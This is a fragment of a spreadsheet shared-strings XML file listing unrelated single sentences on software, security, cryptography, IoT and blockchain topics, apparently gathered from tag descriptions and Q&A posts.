    <t>JOSE is short for Javascript Object Signing and Encryption, which is the IETF Working Group that developed the JSON Web Signature (JWS), JSON Web Encryption (JWE) and JSON Web Key (JWK) specifications.</t>
  </si>
  <si>
    <t>In particular tools for specifying and validating software architectures as well as for finding bugs.</t>
  </si>
  <si>
    <t>Some data-races may be benign (for example, when the memory access is used for a busy-wait), but many data-races are bugs in the program.</t>
  </si>
  <si>
    <t>It provides services such as distributed transactions, object pooling, activation, and security.</t>
  </si>
  <si>
    <t>It is also the first version of Windows to use product activation to combat illegal software duplication.</t>
  </si>
  <si>
    <t>Implementation of validation of and verification schemes
They should not be about whether design "A" is better than design "B" etc.</t>
  </si>
  <si>
    <t>Devices may be connected through a computer network to allow control by a personal computer, and may allow remote access from the internet.</t>
  </si>
  <si>
    <t>Reason:
I have raspberri pi product - customer get it home, when plug in power supply,RPi starts up and runs backend programs with root privilege and communicates with my desktop software.</t>
  </si>
  <si>
    <t>Also the other answer seems to be on the right track getting the pid
Warning Executing shell commands that incorporate unsanitized input from an untrusted source makes a program vulnerable to shell injection, a serious security flaw which can result in arbitrary command execution.</t>
  </si>
  <si>
    <t>High-bandwidth Digital Content Protection (HDCP; commonly, though incorrectly, referred to as High-Definition Copy(right) Protection) is a form of digital copy protection developed by Intel Corporation to prevent copying of digital audio and video content as it travels across connections.</t>
  </si>
  <si>
    <t>Underlying the Java SE Platform is a dynamic, extensible security architecture, standards-based and interoperable.</t>
  </si>
  <si>
    <t>Smart contracts also known as a smart property are computer protocols that facilitate, verify, or enforce the negotiation or performance of a contract, or that make a contractual clause unnecessary.</t>
  </si>
  <si>
    <t>Applications can design for many-core machines by using lock-free synchronisation mechanisms, minimising contention over locks (just as you do with any parallel program) and attempting to physically place memory within the NUMA node where it will be needed most often.</t>
  </si>
  <si>
    <t>It outputs memory leak reports at the end of the debugging session, which includes the full call stack showing how any leaked memory blocks were allocated.</t>
  </si>
  <si>
    <t>CouchDB has built-in conflict detection and management and the replication process is incremental and fast, copying only documents and individual fields changed since the previous replication.</t>
  </si>
  <si>
    <t>Consider the following scenario  a private blockchain for a driverless connected car that will enable secure and realtime interactions from the car starting with car startup, driver authentication, smart contracts to exchange insurance and maintenance service information and realtime location info to track safety.</t>
  </si>
  <si>
    <t>The information typically includes a commit id, the identify of the user who made the change, and the timestamp of the change.</t>
  </si>
  <si>
    <t>Pact Go enables consumer driven contract testing, providing a mock service and DSL for the consumer project, interaction playback and verification for the service provider project.</t>
  </si>
  <si>
    <t>Ninject Interception is a Ninject Extension project which facilitates the use of interceptors, a design pattern commonly used in Aspect Oriented Programming (AOP).</t>
  </si>
  <si>
    <t>Overview
The Google Site Verification API lets you develop applications or services that automate the process of verifying that the authenticated user owns a domain or website.</t>
  </si>
  <si>
    <t>Enables consumer driven contract testing, providing a mock service and DSL for the consumer project, and interaction playback and verification for the service provider project.</t>
  </si>
  <si>
    <t>Erlang has built-in support for concurrency, distribution, fault tolerance, and has been used for years to build reliable systems in the telecommunications industry.</t>
  </si>
  <si>
    <t>Open Source Biometric Recognition is a communal biometrics framework supporting the development of open algorithms and reproducible evaluations.</t>
  </si>
  <si>
    <t>What I've determined so far is:
An apple certified USB-Serial or USB OTG cable must be used
"Redpark" sell this product but it is restricted for non-commercial use
A "Made for iPhone" licence is required to make any hardware for apple if I were to make my own cable
A iOS developer licence is required to write the app
Question 2: How much does MFi certification cost?</t>
  </si>
  <si>
    <t>End-to-end Security:- MIDP 2.0 adds a robust end-to-end
security model, built on open
standards, that protects the network,
applications and mobile information
devices.</t>
  </si>
  <si>
    <t>A CSR is a request sent to a Certification Authority to receive a digital certificate based on the information contained within the CSR such as the identity of the web site or user applying for the certificate.</t>
  </si>
  <si>
    <t>It can be used to detect flaws in any software with an underlying SQL database</t>
  </si>
  <si>
    <t>Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be swift, secure, and small.</t>
  </si>
  <si>
    <t>DMARC, (Domain-based Message Authentication, Reporting &amp; Conformance), is a technical specification standardizing how email receivers perform email authentication using the well-known SPF and DKIM mechanisms.</t>
  </si>
  <si>
    <t>https://drive.google.com/open?id=0B9zzhouEyyN_RmttYVVOZXE0d2JXNWtTZHBjTlZYRTZkdy1N
From what I can read it has to do with an authority problem from where the program is being run.</t>
  </si>
  <si>
    <t>A library for a desktop computer would surely rate the code size a fair trade off for safety.</t>
  </si>
  <si>
    <t>Linux is open source, its code are observed and criticized by the millions of specialists all over the world, so it's mostly robust.</t>
  </si>
  <si>
    <t>Is there any good document which shows making codes process for WinRT?</t>
  </si>
  <si>
    <t>A HID device specifies how its data should be interpreted by providing a structure called the HID report descriptor.</t>
  </si>
  <si>
    <t>Increased memory usage for this process might indicate that it has been "hijacked".</t>
  </si>
  <si>
    <t>Type safety
Want to be sure your API meets a specification?</t>
  </si>
  <si>
    <t>This event can cause noticeable effects in all types of digital communications.The causes of packet loss include inadequate signal strength at the destination, natural or human-made interference, excessive system noise, hardware failure, software corruption or overburdened network nodes.</t>
  </si>
  <si>
    <t>Guix makes it easy for unprivileged users to install, upgrade, or remove packages, to roll back to a previous package set, to build packages from source, and generally assists with the creation and maintenance of software environments.</t>
  </si>
  <si>
    <t>There are two things I would expect could happen: you overwrite data you should not, or you write to a memory location that is somehow protected and generate an unexpected interrupt (I am not sure if the ESP32 supports memory protection and whether you use it).</t>
  </si>
  <si>
    <t>Do threat sleep and then check if all command are processed, if no then again threat sleep?</t>
  </si>
  <si>
    <t>If you're running a standard kernel, any user can see the list of all processes without special privileges.</t>
  </si>
  <si>
    <t>You're better off designing a device that can use WiFi to talk to the iPhone, then you can use the standard networking APIs and don't need any special permission from Apple.</t>
  </si>
  <si>
    <t>Android does not handle this process for you, so you will need to initiate pairing between the two devices before any GATT transactions are attempted.</t>
  </si>
  <si>
    <t>G2log is an asynchronous, "crash safe" logger and design-by-contract library.</t>
  </si>
  <si>
    <t>In database systems, a consistent transaction is one that does not violate any integrity constraints during its execution.</t>
  </si>
  <si>
    <t>Professional certifications in computer technology are non-degree awards made to those who have achieved qualifications specified by a certifying authority.</t>
  </si>
  <si>
    <t>Information protection services is an abstraction for terms like Data Classification, Labeling, and Protection (CLP).</t>
  </si>
  <si>
    <t>Individual identities are associated with or tagged with the role descriptor.</t>
  </si>
  <si>
    <t>What is Infection
Infection is a PHP mutation testing framework based on AST (Abstract Syntax Tree) mutations.</t>
  </si>
  <si>
    <t>The script or program to execute typically needs to be registered in some list of autostart programs.</t>
  </si>
  <si>
    <t>Cryptological applications which need to handle very large integers because many algorithms (integer factorization, Diffie-Hellman key exchange) are based on them.</t>
  </si>
  <si>
    <t>I recently acquired a few XBee Xstick ZBs (http://www.digi.com/products/wireless-modems-peripherals/wireless-range-extenders-peripherals/xstick) and am attempting to connect them to Android phones to do mesh networking.</t>
  </si>
  <si>
    <t>I wants to make my Pi a network security tool, so I downloaded the source code from Raspberry Pwn's github source [https://github.com/pwnieexpress/Raspberry-Pwn].</t>
  </si>
  <si>
    <t>computer1(192.168.0.56) contains the ffollowing program
from another another computer(192.168.0.4) i want to insert value to the table
error: access denied root@192.168.0.4</t>
  </si>
  <si>
    <t>My application is security camera and this means I can run the camera for days and no recorded file will see, only when I stop the recording that recorded files will appear on this.</t>
  </si>
  <si>
    <t>I am currently writing a program that detects if an IoT is compromised (i.e sending information its not supposed to).</t>
  </si>
  <si>
    <t>Maybe you can :
use a key to hash the whole or sensitive part of the transaction so only the correct key can decode the request back on the server.</t>
  </si>
  <si>
    <t>Anyway, to your question: Exception 29 is 'storeprohibitedcause,' meaning that your code tried to write to a protected area in memory.</t>
  </si>
  <si>
    <t>All processes you run from the terminal run as child processes of the SSH process you established.</t>
  </si>
  <si>
    <t>If the national characters are hardcoded in your source, convert the source file to the same encoding.</t>
  </si>
  <si>
    <t>The DevEUI is a global end device ID in IEEE EUI64 address space that uniquely identifies the end device.</t>
  </si>
  <si>
    <t>Signing your applications, plug-ins, and installer packages with a Developer ID certificate lets Gatekeeper verify that they are not known malware and have not been tampered with.</t>
  </si>
  <si>
    <t>Code-access security is security specific to limiting access to or protecting source code, through the use of processes such as encryption, obfuscation, and more.</t>
  </si>
  <si>
    <t>It serves as the messaging foundation for systems that exchange electronic transactions made by cardholders using payment cards.</t>
  </si>
  <si>
    <t>A botnet is a collection of internet-connected programs communicating with other similar programs in order to perform tasks.</t>
  </si>
  <si>
    <t>A secret key is a piece of data that is known by a limited number of users / programs and that participates in protecting information (or access to the information).</t>
  </si>
  <si>
    <t>Deployment Risk Analytics is an IBM Bluemix service that collects and analyzes the results from test tools and other monitoring tools.</t>
  </si>
  <si>
    <t>Use this tag to refer about the Google reCAPTCHA tool to differentiate humans and bots without requesting to solve a CAPTCHA.</t>
  </si>
  <si>
    <t>All of the source code can be used royalty-free, just makeing sure that the copyright notice is not removed from the source code.</t>
  </si>
  <si>
    <t>Fraud-prevention is the proactive identification of the causal and enabling factors of fraud, to prevent fraud from happening in the first place.</t>
  </si>
  <si>
    <t>A login or logon refers to the credentials required to obtain access to a computer system or other restricted area.</t>
  </si>
  <si>
    <t>MNIST is a database of handwritten digits collected by Yann Lecun, a famous computer scientist, when he was working at AT&amp;T-Bell Labs on the problem of automation of check readings for banks.</t>
  </si>
  <si>
    <t>Short for Hardware Identification, a security measure used by Microsoft upon the activation of the Windows operating system.</t>
  </si>
  <si>
    <t>As a result of SOX, top management must now individually certify the accuracy of financial information.</t>
  </si>
  <si>
    <t>The software application verifies that the token originated from a trusted STS, and then makes authorization decisions accordingly.</t>
  </si>
  <si>
    <t>ProFTPD is a FTP server built from the ground up after developers grew tired of fixing bugs and hacking features into wu-ftpd.</t>
  </si>
  <si>
    <t>The API allows you to encode ASN.1 structures to create binary data such as certificate signing requests (CSR), X.509 certificates or certificate revocation lists (CRL).</t>
  </si>
  <si>
    <t>You can use CodeCommit to securely store anything from source code to binaries, and it works seamlessly with your existing Git tools.</t>
  </si>
  <si>
    <t>Flink streaming uses a light-weight fault-tolerance mechanism with exactly-once processing guarantees.</t>
  </si>
  <si>
    <t>The Exonum framework is oriented towards creating permissioned blockchains, that is, blockchains with the known set of blockchain infrastructure providers.</t>
  </si>
  <si>
    <t>Ruckus Networks is a company selling wired and wireless networking equipment and software.</t>
  </si>
  <si>
    <t>Anyone can use Infer to intercept critical bugs before they have shipped to users, and help prevent crashes or poor performance.</t>
  </si>
  <si>
    <t>Software is a special case of copyright, because even non-proprietary licenses use the notion of copyright to further their goals - see Copyleft and the GPL.</t>
  </si>
  <si>
    <t>ccTalk (pronounced see-see-talk) is a serial protocol in widespread use throughout the money transaction industry.</t>
  </si>
  <si>
    <t>Algorithmic trading refers to the use of electronic platforms for entering trading orders in with minimum human intervention.</t>
  </si>
  <si>
    <t>OSx86 (from Mac OS X and x86) is a collaborative hacking project to run the Mac OS X computer operating system on non-Apple personal computers with x86 architecture and x86-64 compatible processors.</t>
  </si>
  <si>
    <t>These facilities include such things as memory-leak tracking, fence-post write detection, file/line number reporting, and general logging of statistics.</t>
  </si>
  <si>
    <t>It is usually a third-party service that is actually a system of computer processes that process, verify, and accept or decline credit card transactions on behalf of the merchant through secure Internet connections.</t>
  </si>
  <si>
    <t>MaskedEditValidator, part of the AjaxControlToolkit is a custom validator which attaches to the MaskedEdit extender and its associated TextBox and verifies that the input text matches the pattern specified in the MaskedEdit extender</t>
  </si>
  <si>
    <t>MaskedEditValidator, part of the AjaxControlToolkit is a custom validator which attaches to the MaskedEdit extender and its associated TextBox and verifies that the input text matches the pattern specified in the MaskedEdit extender.</t>
  </si>
  <si>
    <t>bug tracking software, for implementing custom policies and for e-mail notifications.</t>
  </si>
  <si>
    <t>In other words, I would move into a new location, the RaspberryPi would be connected to my hotspot and would begin testing, and once I obtain the wireless network/password for that location, I want to connect to the RaspberryPi to add that information so it can connect to the location's wifi network instead of my hotspot.</t>
  </si>
  <si>
    <t>Autofill is an option found in software programs such as Internet browsers that allows the users to quickly fill out common forms, with fields such as their address, e-mail, or credit card information.</t>
  </si>
  <si>
    <t>Intermec is a manufacturer and supplier of automated identification and data capture equipment, including barcode scanners, barcode printers, mobile computers, RFID systems, voice recognition systems, and life cycle services</t>
  </si>
  <si>
    <t>It is not designed for complete security (it is still possible to disassemble the script into op codes using a package such as XDebug), however it does keep people out of your code and make reverse engineering difficult.</t>
  </si>
  <si>
    <t>FME (Feature Manipulating Engine) is an ETL (Extract Transform Load) tool by Safe Software.</t>
  </si>
  <si>
    <t>E-mail spam, known as unsolicited bulk Email (UBE), junk mail, or unsolicited commercial email (UCE), is the practice of sending unwanted e-mail messages, frequently with commercial content, in large quantities to an indiscriminate set of recipients.</t>
  </si>
  <si>
    <t>Background
Void-safety represents a sound static-analysis-based approach to guarantee that access on void target (causing null-pointer exceptions) may never occur at run-time in an object-oriented program that satisfies void-safety conditions.</t>
  </si>
  <si>
    <t>My script involves a facial detection on the first stage and a video recording on the second stage using openCv library.</t>
  </si>
  <si>
    <t>Second
Once you are connected via ssh, open the python file you want with nano or vim (command line-based text editors) with:
nano /users/brian/Documents/python-project/myfile.py
Where /users/brian/Documents/python-project/myfile.py is the location of the file on your raspberry pi.</t>
  </si>
  <si>
    <t>An application programming interface key (API key) is a code passed in by computer programs calling an API (application programming interface) to identify the calling program, its developer, or its user to the Web site.</t>
  </si>
  <si>
    <t>In case someone encountres same thing, my problem was actualy caused by high memory usage in other parts of my project, I used AES for encryption on application layer, without it everything works great.</t>
  </si>
  <si>
    <t>Coq is used for software verification, the formalization of programming languages, the formalization of mathematical theorems, teaching, and more.</t>
  </si>
  <si>
    <t>ZBar is an open source software suite for reading bar codes from various sources, such as video streams, image files and raw intensity sensors.</t>
  </si>
  <si>
    <t>Armory is an open source wallet management platform for the Bitcoin network.</t>
  </si>
  <si>
    <t>The EOS.IO Software is open source blockchain infrastructure software.</t>
  </si>
  <si>
    <t>Privilege separation 
Programs are allowed to carry open file descriptors (for files, pipelines and network connections) into the chroot, which can simplify jail design by making it unnecessary to leave working files inside the chroot directory.</t>
  </si>
  <si>
    <t>Firefox saves your personal information such as bookmarks, passwords, and user preferences in a set of files called your profile, which is stored in a separate location from the Firefox program files.</t>
  </si>
  <si>
    <t>Overview
The Sigar API provides a portable interface for gathering system information such as:
System memory, swap, cpu, load average, uptime, logins
Per-process memory, cpu, credential info, state, arguments, environment, open files
File system detection and metrics
Network interface detection, configuration info and metrics
TCP and UDP connection tables
Network route table
This information is available in most operating systems, but each OS has their own way(s) providing it.</t>
  </si>
  <si>
    <t>That said, as an individual, you can probably make do with any valid OID for testing purposes.</t>
  </si>
  <si>
    <t>Static for private encapsulation, which is needed for good program design.</t>
  </si>
  <si>
    <t>Such encryption schemes are currently not standardized by any major standards organization, but a recently launched effort by the HomomorphicEncryption.org group attempts to instead create a consortium standard describing secure parameters, a standard API, and a programming model for several schemes, including the BFV and the CKKS schemes.</t>
  </si>
  <si>
    <t>EDIT:
Here is the content of the WER Report that shows the Activation Failure of my app upon startup.</t>
  </si>
  <si>
    <t>since its execution is guaranteed, then its behavior can be used as a tool to mimic a functional watchdog.</t>
  </si>
  <si>
    <t>There is pseudocode of your potential program:
This program will write initial values to EEPROM only for first time.</t>
  </si>
  <si>
    <t>AquaticPrime is an open source library for OS X to manage application licenses and their verification.</t>
  </si>
  <si>
    <t>KeeFox connects Firefox to KeePass Password Safe, the popular free open source password manager.</t>
  </si>
  <si>
    <t>It has built-in support for concurrency, distribution and fault tolerance.</t>
  </si>
  <si>
    <t>Hyperledger Indy is a distributed ledger, purpose-built for decentralized identity.</t>
  </si>
  <si>
    <t>Usually, an OpenPOWER system's firmware consists of:
Open sourced BMC: OpenBMC
Open sourced host firmware: Hostboot, Skiboot, Petitboot
And usually it runs Ubuntu, CentOS (or RHEL), OpenSUSE (or SLES).</t>
  </si>
  <si>
    <t>bitcoin is a 1st generation, open source, peer-to-peer digital cryptocurrency and a distributed payment network with no central authority.</t>
  </si>
  <si>
    <t>The reason that there should be a standard for the result of encryption (regardless of whether the binary is converted to hex or to base64 for safe transit) is that one might want to use, say, PHP for encoding but JavaScript for decoding, depending on which languages are natural to use at two locations.</t>
  </si>
  <si>
    <t>It provides port-forwarding services, screen capture on the device, thread and heap information on the device, logcat, process, and radio state information, incoming call and SMS spoofing, location data spoofing, and more.</t>
  </si>
  <si>
    <t>silvertunnel.org - easy-to-use secure and anonymous communication
This project provides software tools for anonymous Internet usage: a Java network library, an easy-to-use web browser and additional Java tools to easily access the Tor anonymity network.</t>
  </si>
  <si>
    <t>From kernel space you can access it directly since there's no memory protection, but, you'd have to use phys_to_virt function to translate the addresses.</t>
  </si>
  <si>
    <t>Also in your code you should put some anti-bouncing protection, otherwise if the LDR value changes quickly your LED will blink instantly.</t>
  </si>
  <si>
    <t>Zend Guard is a PHP encoding and obfuscation product that makes it harder to reverse engineer an application.</t>
  </si>
  <si>
    <t>Uglifier change the source code of a program without changing their semantics, to prevent reverse engineering.</t>
  </si>
  <si>
    <t>Juniper Networks designs and markets IT networking products, such as routers, switches and IT security products</t>
  </si>
  <si>
    <t>Hyperledger is an open source collaborative effort created to advance cross-industry blockchain technologies.</t>
  </si>
  <si>
    <t>Aeronautical Radio, Incorporated (ARINC) defines reference standards for avionics equipment - APIs for safety critical systems.</t>
  </si>
  <si>
    <t>OpenSSL is an open source software toolkit that implements the SSL/TLS protocol, as well as a general cryptographic library.</t>
  </si>
  <si>
    <t>It covers both methods of concealing information and methods of detecting hidden information.</t>
  </si>
  <si>
    <t>In information security, the term payload generally refers to the part of malicious code that performs the destructive operation.</t>
  </si>
  <si>
    <t>Typical authorization in everyday computer life is for example granting read access to a specific file for authenticated user.</t>
  </si>
  <si>
    <t>This means the key that is used to sign the file has a public and private part and theoretically it would not be possible to manipulate the license file using only one part of the key.</t>
  </si>
  <si>
    <t>Identity is a property of an object that uniquely defines its abstract location.</t>
  </si>
  <si>
    <t>Winlogon is a common target for several threats that could modify its function and memory usage.</t>
  </si>
  <si>
    <t>Cuckoo is an advanced, extremely modular, and 100% open source automated malware analysis system with infinite application opportunities.</t>
  </si>
  <si>
    <t>This standard is reused in many applications and standards such as S/MIME (RFC 3851), Timestamping (RFC 3161), PDF Signature, Microsoft Authenticode, CaDES (Advanced Electronic Signature, RFC 5126), etc.</t>
  </si>
  <si>
    <t>2Checkout simplifies your checkout process by bundling the merchant account and payment gateway, offering international options, and a branded experience while maintaining the highest level of security and fraud protection.</t>
  </si>
  <si>
    <t>IBM Maximo Worker Insights is a cloud offering that enables companies to potentially minimize or avoid hazards, injuries, and claims by providing proactive protections with personalized risk assessment and real-time protection.</t>
  </si>
  <si>
    <t>Transaction processing is designed to maintain a system's Integrity (typically a database or some modern filesystems) in a known, consistent state, by ensuring that interdependent operations on the system are either all completed successfully or all canceled successfully.</t>
  </si>
  <si>
    <t>Yelp's API program enables you to access trusted Yelp information in real time, such as business listing info, overall business ratings and review counts, deals and recent review excerpts.</t>
  </si>
  <si>
    <t>The leak is 48 bytes and the call tree looks like this (from Leaks-tool in Instruments):
Leaked object is called 'OS_dispatch_semaphore'.</t>
  </si>
  <si>
    <t>After the Google Sign In, the process to exchange the credentials with Firebase and "login in" into firebase is very fast, the problem happens only on the "google sign in" part.</t>
  </si>
  <si>
    <t>From http://arduino.cc/en/Reference/PROGMEM:
Some cryptic bugs are generated by using ordinary datatypes for program memory calls.</t>
  </si>
  <si>
    <t>Additionally, you should make sure any anti-virus software is not blocking communication on port 5353.</t>
  </si>
  <si>
    <t>Of course this is not entirely secure, somebody could either read the password from memory without taking the Pi (you said they have physical access), or they could maintain power while taking it so that the password is kept in memory.</t>
  </si>
  <si>
    <t>Delete the individual enrollment and make sure that you've gone through the verification of your X.509 signing cert (in the Certificates tab in the Azure portal).</t>
  </si>
  <si>
    <t>When you launch a program via the debugger, Qt Creator is connecting to the remote device (via your settings in Tools &gt; Options &gt; Devices), and running the program via ssh.</t>
  </si>
  <si>
    <t>Loaded XBRL documents are automatically validated against the information against the XBRL specification, and exceptions are thrown when invalid XBRL documents are loaded.</t>
  </si>
  <si>
    <t>Cryptocurrency can be mined and stored into an electronic wallet, locally on a computer or flash drive.</t>
  </si>
  <si>
    <t>Simple Object Access Protocol (SOAP) is a protocol specification for exchanging structured information in the implementation of Web Services.</t>
  </si>
  <si>
    <t>Crypto Obfuscator is a commercial package for obfuscation of .NET code into logic which is hard to disassemble and understand by humans.</t>
  </si>
  <si>
    <t>seL4 is the most advanced member of the L4 microkernel, notable for its comprehensive formal verification, which sets it apart from any other operating system.</t>
  </si>
  <si>
    <t>The copyright tag is for issues relating to the creation and/or display of copyright information.</t>
  </si>
  <si>
    <t>admin may refer to both physical persons or software accounts that are dedicated and privileged to change the system they operate.</t>
  </si>
  <si>
    <t>Database replication is used to ensure consistency between redundant databases and to improve reliability and increase fault-tolerance.</t>
  </si>
  <si>
    <t>In computer science and information theory, Huffman coding is an entropy encoding algorithm used for lossless data compression.</t>
  </si>
  <si>
    <t>Stripe Radar: A real-time ML fraud prevention powered by behavioral information and data from the Stripe network.</t>
  </si>
  <si>
    <t>A candidate key is a certain minimal set of one or more attributes that can uniquely identify individual tuples in a relation value.</t>
  </si>
  <si>
    <t>It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users.</t>
  </si>
  <si>
    <t>By design, unique 48-bit ID for identifying different radio chipsets used in variety of Wireless Access Points.</t>
  </si>
  <si>
    <t>No offline tools or server side encryption is needed when generating and deploying 3D assets and tracking patterns.</t>
  </si>
  <si>
    <t>In addition to using virus protection software, it may be helpful to set your browser security settings properly.</t>
  </si>
  <si>
    <t>This not only facilitates compatibility and interoperability amongst different programs, but also assures that they all implement password management in a secure and documented manner.</t>
  </si>
  <si>
    <t>The Google Identity tools help you quickly build an auth system that will grow with your business and reduce the friction of getting users into your app.</t>
  </si>
  <si>
    <t>It is also possible to build services stand-alone, outside of any application, which is most easily achieved with Automator, the standard workflow-authoring tool.</t>
  </si>
  <si>
    <t>An identifying relationship is one where the primary key is populated to the child weak entity as a primary key in that entity.</t>
  </si>
  <si>
    <t>This specification also describes a
  functional model of a WebAuthn compliant authenticator, including its
  signature and attestation functionality.</t>
  </si>
  <si>
    <t>PyEDA is primarily concerned with implementing the data structures and algorithms necessary for performing logic synthesis and verification.</t>
  </si>
  <si>
    <t>The technique was developed for exception-safe resource management in C++ during 198489, primarily by Bjarne Stroustrup and Andrew Koenig, and the term itself was coined by Stroustrup.</t>
  </si>
  <si>
    <t>Although no successful attacks have yet been reported on the SHA-2 variants, they are algorithmically similar to SHA-1 and so efforts are underway to develop improved alternatives.</t>
  </si>
  <si>
    <t>Authentication is the process of determining whether someone or something is, in fact, who or what it is declared to be - the act of confirming the truth of an attribute of a datum or entity.</t>
  </si>
  <si>
    <t>Programmers can specify if their programs to require admin (elevated) token so that OS will always attempt to launch the process with elevation.</t>
  </si>
  <si>
    <t>Exception safety
Exception safety, as formalised by David Abrahams, guarantees a set of contract guidelines that an interface (or operation) offers w.r.t.</t>
  </si>
  <si>
    <t>Authorization, the process of deciding whether to allow an entity access to, or to perform operations upon, other entities is outside the scope of Zend_Auth.</t>
  </si>
  <si>
    <t>The technology allows computers to read information (such as account numbers) off printed documents.</t>
  </si>
  <si>
    <t>These transactions are verified by network nodes through the use of cryptography and recorded in a public distributed ledger called a blockchain.</t>
  </si>
  <si>
    <t>Reference - Points to the external document or the internal parts of the document that should be signed.</t>
  </si>
  <si>
    <t>Isolated storage is a data storage mechanism that provides isolation and safety by defining standardized ways of associating code with saved data.</t>
  </si>
  <si>
    <t>Let me try to explain what I am trying to accomplish the best that I can: 
I want to get a USB female type A onto a arduino board, and allow for it to verify information from a USB drive as part of my project.</t>
  </si>
  <si>
    <t>Unless your game is strictly for fun, with no stakes of whatever kind involved, I would choose something cryptographically secure, such as the AES approach suggested by others.</t>
  </si>
  <si>
    <t>'SecComp' is an abbreviation for Secure Computing Mode, a facility built into modern Linux kernels that can be used to constrain (irreversibly) what a program is allowed to do.</t>
  </si>
  <si>
    <t>BTrace Program Structure
A BTrace program is a plain Java class that has one or more
methods that are annotated with BTrace annotations.</t>
  </si>
  <si>
    <t>The library is written by Dominick Baier, a security expert involved with the creation of WIF and co-author of Claims Based Identity &amp; Access Control Guide.</t>
  </si>
  <si>
    <t>Redistributions in binary form must reproduce the above copyright
#   notice, this list of conditions and the following disclaimer in the
#   documentation and/or other materials provided with the distribution.</t>
  </si>
  <si>
    <t>Hence, the understanding of potentially risky situations is increasingly multifaceted, which again challenges risk assessors in terms of giving the right relative priority to the multitude of contributing risk factors.</t>
  </si>
  <si>
    <t>Manual code reviews and automated evaluation using tools for static or dynamic code analysis can help improve code quality and promote more secure coding.</t>
  </si>
  <si>
    <t>This might involve confirming the identity of a person or software program, tracing the origins of an artifact, or ensuring that a product is what its packaging and labeling claims to be.</t>
  </si>
  <si>
    <t>FIDO Universal 2nd Factor (U2F)a rapidly growing open authentication standard, allows greater user account login security</t>
  </si>
  <si>
    <t>A vendor-neutral open standard for distributed tracing</t>
  </si>
  <si>
    <t>JOnAS is a Java EE 5 certified Open Source OSGi Enterprise Server.</t>
  </si>
  <si>
    <t>It works by letting users record fake ancestry information for commits.</t>
  </si>
  <si>
    <t>2FA is ineffective against modern threats,[1] like ATM skimming, phishing, and malware etc.</t>
  </si>
  <si>
    <t>Smartcards have a dedicated standard: ISO/IEC 7816 that describes what defines a smartcard from physical characteristics to cryptographic information application, including protocols and commands.</t>
  </si>
  <si>
    <t>Detailed information around the Breathalyzer project can be found on my blog.</t>
  </si>
  <si>
    <t>Microsoft Structured Exception Handling (SEH) is the native exception handling mechanism for Windows.</t>
  </si>
  <si>
    <t>an open source trusted execution environment.</t>
  </si>
  <si>
    <t>This file structure is used to hold bare keys, personal certificates and public certificates for use by Java-based applications.</t>
  </si>
  <si>
    <t>Verification &amp; Validation (Quality Control): In this important phase, a high level software validation activity occurs, much of it on a near-complete version of the software system.</t>
  </si>
  <si>
    <t>OpenAM is the open source authentication, authorization, entitlement and federation software derived from Sun Microsystem's OpenSSO.</t>
  </si>
  <si>
    <t>It is open source software written in C, and is unencumbered by patents.</t>
  </si>
  <si>
    <t>Trusted Boot - ensures a safe startup process through security-critical decisions based on recorded measurements
SE for Android - enhances protection by isolating applications and data
Enhancements for TIMA - ensures that security mechanisms cannot be pre-empted or 
disabled by malicious software
Kernel Protection - monitors the kernel in real-time
Keystore - protects encryption keys in the TrustZone
Certificate Manager - secures and manages client certificates in the TrustZone.</t>
  </si>
  <si>
    <t>Kata Containers is an open source project and community working to build a standard implementation of lightweight Virtual Machines (VMs) that feel and perform like containers, but provide the workload isolation and security advantages of VMs.</t>
  </si>
  <si>
    <t>These travel routers
  are typically designed for hotel use, and so handle captive portal
  networks well.</t>
  </si>
  <si>
    <t>IBM Cognos Business Intelligence is a web-based, integrated business intelligence suite by IBM.</t>
  </si>
  <si>
    <t>The root cause for an invalid pointer value may be far from the location generating the segmentation fault.</t>
  </si>
  <si>
    <t>A constrained execution region (CER) is part of a mechanism for authoring reliable managed code.</t>
  </si>
  <si>
    <t>From Wikipedia: 
A session is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and user (see Login session).</t>
  </si>
  <si>
    <t>People who engage in computer hacking activities are often called hackers.</t>
  </si>
  <si>
    <t>Public Sector entities receive a physically isolated instance of Microsoft Azure that employs world-class security and compliance services critical to U.S. government for all systems and applications built on its architecture.</t>
  </si>
  <si>
    <t>As for example, Eric S. Raymond, a renowned persona of the computer programming industry rejects the idea of hacking being a criminal activity by saying:
Being able to break security doesn't make you a hacker anymore than being able to hotwire cars makes you an automotive engineer
He has written a long treatise on this topic.</t>
  </si>
  <si>
    <t>Consequently, if your web app handles sensitive information, make sure to ask the user if they're on a trusted device before enabling persistence.</t>
  </si>
  <si>
    <t>Microsoft Outlook is a personal information manager (most notably used for handling e-mail), available both as a separate application as well as a part of the Microsoft Office suite.</t>
  </si>
  <si>
    <t>Phishing is a type of Internet fraud that seeks to acquire a users credentials by deception.</t>
  </si>
  <si>
    <t>The purpose of this level of testing is to expose faults in the interaction between integrated units.</t>
  </si>
  <si>
    <t>Again, this seems like a good design for typical desktop environment and a library that you want to be safe.</t>
  </si>
  <si>
    <t>Open source static-analysis security vulnerability scanner for Ruby on Rails applications</t>
  </si>
  <si>
    <t>Echoprint is an open source music identification system that allows anyone to build music fingerprinting into their application.</t>
  </si>
  <si>
    <t>DLL injection is often used by external programs to influence the behaviour of another program in a way its authors did not anticipate or intend.</t>
  </si>
  <si>
    <t>Error messages are seen widely throughout computing, and are part of every operating system or computer hardware device.</t>
  </si>
  <si>
    <t>All these services run within the same process inetinfo.exe, thus they are able to share cached data such as log file data, account information and file handles.</t>
  </si>
  <si>
    <t>For a deeper insight of the current interest on SAT solvers for software and hardware verification, Armin Biere's course on formal systems is a good start.</t>
  </si>
  <si>
    <t>There is not particular standard in how to formulate an user-agent, but browser and device vendors typically standardize within their own scope.</t>
  </si>
  <si>
    <t>This is most likely caused because the LXDE terminal not updating the utmp information which records all logged in users and  determines the username from that information.</t>
  </si>
  <si>
    <t>Disque is a distributed message queue with built in fault tolerance and at least once delivery guarantees</t>
  </si>
  <si>
    <t>The deprecated Google+ People API lets you list authenticated user's circled people and retrieve profile information for the authenticated user.</t>
  </si>
  <si>
    <t>Public keys are not sensitive information and may be known to anybody, whereas the private key needs to be protected very carefully by a strong passphrase.</t>
  </si>
  <si>
    <t>We intend to take you beyond functional testing, and help you tamper with forms, files, GET, POST, AJAX, cookies, headers, and more.</t>
  </si>
  <si>
    <t>CAL has the capability to carry out the mobile number verification at any stage i.e during installation or in between the application process.</t>
  </si>
  <si>
